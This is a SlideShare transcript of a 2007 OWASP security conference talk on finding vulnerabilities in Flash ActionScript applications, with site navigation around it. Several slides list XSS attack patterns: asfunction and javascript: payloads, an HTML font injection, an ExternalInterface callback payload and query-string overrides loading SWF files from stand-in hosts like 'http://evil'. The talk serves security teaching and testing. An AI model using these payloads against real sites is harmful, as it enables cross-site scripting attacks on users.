• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps
 

Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps

on

  • 4,094 views

 

Statistics

Views

Total Views
4,094
Views on SlideShare
4,001
Embed Views
93

Actions

Likes
1
Downloads
0
Comments
1

3 Embeds 93

http://fuzzing.ru 87
http://static.slideshare.net 5
http://www.health.medicbd.com 1

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel

11 of 1 previous next

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…

  • 231123
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps Presentation Transcript

    • Finding Vulnerabilities in Flash Applications Stefano Di Paola CTO MindedSecurity [email_address] +393209495590
      • Stefano Di Paola:
        • CTO & Co-Founder Minded Security
        • Security Engineer & Researcher
        • Web App Pen Tester
        • Code Review and Forensic
        • Vulnerabilities (PDF UXSS & Others)
        • OWASP Italy R&D Director
      $ Whoami^J
    • Agenda
      • Introduction
      • SWF Client Side Attacks
      • Finding Injection Entry Points
      • Potentially Dangerous Native Functions and Objects
      • Runtime Analysis
    • Agenda
      • Introduction
      • SWF Client Side Attacks
      • Finding Injection Entry Points
      • Potentially Dangerous Native Functions and Objects
      • Runtime Analysis
    • Objectives
      • Focus on Flash ActionScript 2 Applications Security
      • Understand the attack flow
      • Dead Code Analysis Methodology
      • Runtime Analysis Methodology
    • Flash Apps - Security Concerns
      • Can execute JavaScript when embedded in a HTML page and viewed from inside a Browser.
      • Can forge binary requests and HTTP Requests.
      • Can execute external Flash Movies.
      • Can play Audio/Video files natively.
      • Can display minimal HTML code inside a TextField.
    • Agenda
      • Introduction
      • SWF Client Side Attacks
      • Finding Injection Entry Points
      • Potentially Dangerous Native Functions and Objects
      • Runtime Analysis
    • SWF Client Side Attacks
      • This new attack vector was presented @ OWASP 2007 Appsec Conference in Milan, Italy
      • Relies on flawed SWF files and not on SWF parser
      • A flawed SWF is a SWF which could allow
        • classical XSS
        • Cross Site Flashing (the dark side of cross movie scripting)
    • Cross Site Flashing (XSF)
      • XSF occurs when from different domains:
        • One Movie loads another Movie with loadMovie* functions or other hacks and has access to the same sandbox or part of it
        • XSF could also occurs when an HTML page uses *Script to script a Macromedia Flash movie, for example, by calling:
          • GetVariable : access to flash public and static object from javascript as a string.
          • SetVariable : set a static or public flash object to a new string value from javascript.
        • Unexpected Browser to SWF communication could result in stealing data from SWF application
    • Accomplishing an Attack using flawed SWF
      • When a link to a flawed SWF is directly pasted to the location bar every browser automatically generates some HTML with Object and/or Embed tags :
      <html> <body marginwidth=&quot;0&quot; marginheight=&quot;0&quot;> <embed width=&quot;100%&quot; height=&quot;100%&quot; name=&quot;plugin&quot; src=&quot;http://Url/To/Swf&quot; type=&quot;application/x-shockwave-flash&quot;/> </body> </html>
    • Attack Example to a Flawed SWF
      • A flawed SWF was uploaded to vi.ct.im Host.
      • Contains the following code
      • Let's see what an attacker could do with a browser ( Video )
      v1.loadv = function () { this.varTarget = new MovieClip(); _root.createEmptyMovieClip('varTarget', 10); var v2 = new XML(); v2.load( _root.test ); };
    • Accomplish an attack
      • So clicking and redirecting to a SWF will let the browser execute it on the main window.
        • Works with every browser.
        • IE7 needs:
      • Iframe 'src' could be used too.
        • Tested on Firefox
        • SWF/Browser interaction doesn't work in IE7 using javascript: .
        • We'll see when it works even with IE7
          • try{ code }catch(e){location.reload()}
    • The Attack Flow We will see the dangerous mechanisms that could lead to Client Side Attacks
        • URL QueryString
        • Global Uninitialized Variables
        • flashVars
        • External Movies
        • Remote XML files
        • MP3 and Flv Movies
        • Embedded HTML
    • Agenda
      • Introduction
      • SWF Client Side Attacks
      • Finding Injection Entry Points
      • Potentially Dangerous Native Functions and Objects
      • Runtime Analysis
    • Register Globals in ActionScript
      • Similar to PHP Register Globals
      • Every uninitialized variable with global scope is a potential threat:
        • _root.*
        • _global.*
        • _level0.*
        • .*
      • It is easy to add it as a parameter in the query string:
      • http://URL ?language=http://evil
      if (_root.language != undefined) { Locale.DEFAULT_LANG = _root.language; } v5.load(Locale.DEFAULT_LANG + '/player_' + Locale.DEFAULT_LANG + '.xml');
    • Register Globals in Included Files 1/2
      • Assumptions made for _level n movies are wrong when a movie supposed to be at level1 is loaded as _level0
      • _level( n-1 ).*
      /* Level0 Movie */ _level0.DEMO_PATH = getHost(this._url); loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'upperlev.swf', (_level0.demo_level + 1)); .... /* Level1 Movie ' upperlev.swf ' */ .... loadMovieNum( _level0.DEMO_PATH + _level0.PATH_DELIMITER + 'debugger.swf', (_level0.control_level + 1)); ......
    • Register Globals in Included Files 2/2
      • Then let's load upperlev.swf and then use query string to initialize DEMO_PATH:
        • http://host/upperlev.swf ?DEMO_PATH=http://evil
      /* Level1 Movie ' upperlev.swf ' */ .... loadMovieNum( _level0.DEMO_PATH + _level0.PATH_DELIMITER + 'debugger.swf', (_level0.control_level + 1)); ......
    • Agenda
      • Introduction
      • SWF Client Side Attacks
      • Finding Injection Entry Points
      • Potentially Dangerous Native Functions and Objects
      • Runtime Analysis
      • Static Analysis
    • Attack Patterns – Quick Reference
      • Some Attack patterns were already described in:
        • Testing Flash Applications
          • http://www.wisec.it/docs.php?id=5
      • A quick reference of attack patterns which trigger XSS in SWF:
        • asfunction :getURL,javascript:alert('XSS')
        • javascript:alert('XSS')
        • <img src='javascript:alert(“XSS”)//.jpg'>
        • http://evil.ltd/evilversion7.swf
    • Attack Patterns – Quick Reference
      • A quick reference of PDNF and Objects where attack pattern could be injected:
        • getURL
        • load*(URL,..) Functions
          • loadVariables(url, level )
          • LoadMovie ( url, target )
          • LoadMovieNum( url, level )
          • XML.load ( url )
          • LoadVars.load ( url )
          • Sound.loadSound( url , isStreaming );
          • NetStream.play( url );
        • TextField.htmlText
    • Attack Patterns – GetURL New Issue
      • The GET issue^N^N^N^N^Nfeature :
        • From Adobe :
          • “ ..The GET method appends the variables to the end of the URL, and is used for small numbers of variables..”
        • if a SWF contains the above, a request like
        • becomes:
        • Credits go to SirDarckCat and Kuza55 who found it
      getURL('javascript:SomeFunc( “ someValue ” )','','GET')
          • http://victim/noundef.swf?a=0:0;alert('XSS')
        • javascript:SomeFunc(“someValue”) ?a=0:0;alert(123)
    • Attack Patterns – ExternalInterface New Issue
      • flash.external.ExternalInterface.call syntax
      • Actually, methodName could be any Javascript code. In fact, when call(' method123 ') is executed, a javascript function is called ( www.develotec.com/flash8api.txt ) :
      public static call(methodName:String, [parameter1:Object])
        • try { __flash__toXML( method123 ()) ; } catch (e) { &quot;<undefined/>&quot;; }
    • External Interface Attack
      • What happens if a SWF contains:
      • http://host/swf?callback= (new Function(“alert(‘Xss’)”))
      • Works with Iframe and IE7 too
      flash.external.ExternalInterface.call( _root.callback ) __flash__toXML( (new Function( “ alert( ‘ Xss ’ ) ” )) ())
    • Attack Patterns – Font New Issue
      • Some code like
      • Rewrites ‘something’ to
        • <p font=“TIMES”>something</p>
      • That could be exploited by injecting :
          • fontFamily = ' ”><img src=”http://evil/evil.swf”><” '
        • createTextField(&quot;txt&quot;, 999, 10, 10, 320, 240);
        • txt.html=true;
        • var _tf:TextFormat = new TextFormat();
        • _tf.font = _root.fontFamily ;
        • txt.setTextFormat( _tf );
        • txt.htmlText='something';
    • Modify the Data Flow 1/4
      • Multiple classes and packages are often used to separate functionality.
      • In Flash, every class/package like
      • is compiled in the following way:
          • push 'simpleClass'
          • getVariable
          • not
          • not
          • branchIfTrue label1
          • ...
          • label1
          • end
          • class simpleClass{}
    • Modify the Data Flow 2/4
      • Decompiled by flare, results in:
      • So simpleClass is a _global attribute.
      • This means that it's initially undefined.
      • So it can be instantiated with a string value from the query string
        • if (!simpleClass) {
        • _global.simpleClass = function () {}; ... }
    • Modify the Data Flow 3/4
      • Suppose there is a class like:
              • class simpleUtils {
              • static public function testForSomething(){
              • if(ok) return true;
              • else return false;
              • } ...
              • class simpleClass {
              • static function main(){
              • if(!simpleUtils.testForSomething()) getURL('javascript:alert(&quot;Sorry!&quot;)');
              • else getURL('javascript:alert(&quot;ok!&quot;)');
              • } ...
    • Modify the Data Flow 4/4
      • Sending the request:
              • http://host/swf.swf? simpleUtils =blah
      • sets the object simpleUtils to an instantiated string, so:
              • simpleUtils.testForSomething()
            • becomes undefined and the flow is modified.
          • if(!simpleUtils.testForSomething())
          • getURL('javascript:alert(&quot;Sorry!&quot;)');
          • else
          • getURL('javascript:alert(&quot;ok!&quot;)');
    • Agenda
      • Introduction
      • SWF Client Side Attacks
      • Finding Injection Entry Points
      • Potentially Dangerous Native Functions and Objects
      • Runtime Analysis
    • Recipe for Runtime Analysis
      • A method to find uninitialized variables
      • A SWF Container which loads the external one
      • One array of attack patterns
      • A framework to mix our ingredients
    • Find Undefined Vars @ Runtime
      • Definition of __resolve :
        • from Adobe:
      • “ a reference to a user-defined function that is invoked if ActionScript code refers to an undefined property or method . If ActionScript code refers to an undefined property or method of an object, Flash Player determines whether the object's __resolve property is defined.”
      • As we need to find _root.* or _global.* undefined variables:
      _ root.__resolve = function (name){ // name is undefined }
    • Attack Patterns Array
      • From our knowledge base, an attack Array will contain the following elements:
        • Direct load asfunction:
          • getURL,javascript:gotRoot(&quot;&quot;)///d.jpg
        • Controlled Evil Page/Host:
          • http://at.tack.er/evil.swf
        • Flash Html Injection:
          • “ '><img src='asfunction:getURL,javascript:gotRoot(“”)//.jpg' >
        • Dom Injection:
          • (gotRoot(''))
        • Js/Flash Error:
          • “ '|!$%&/)=
    • A SWF Container
      • The SWF to be analyzed is closed, so we need a wrapper which shares _root and _global variables
      • The wrapper will contain __resolve methods for _root and _globals.
          • var image_mcl = new MovieClipLoader();
          • image_mcl.addListener(mclListener);
          • _root._lockroot=true
          • image_mcl.loadClip( _root.swfurl+&quot;?&quot;+ _root.varToSend, _root.varTarget);
    • A framework: SWFRTAnalyzer
    • Conclusions
      • A free version of the SWF Runtime Analyser will be released by Minded Security.
      • Awareness about ActionScript security is growing but is still a drop in the ocean.
      • There is still a lot of research to do about Actionscript security.
    • Thank you :) Questions?
      • Web: http://www.mindedsecurity.com
      • Weblog: http://www.wisec.it
      • Email: stefano.dipaola_at_mindedsecurity.com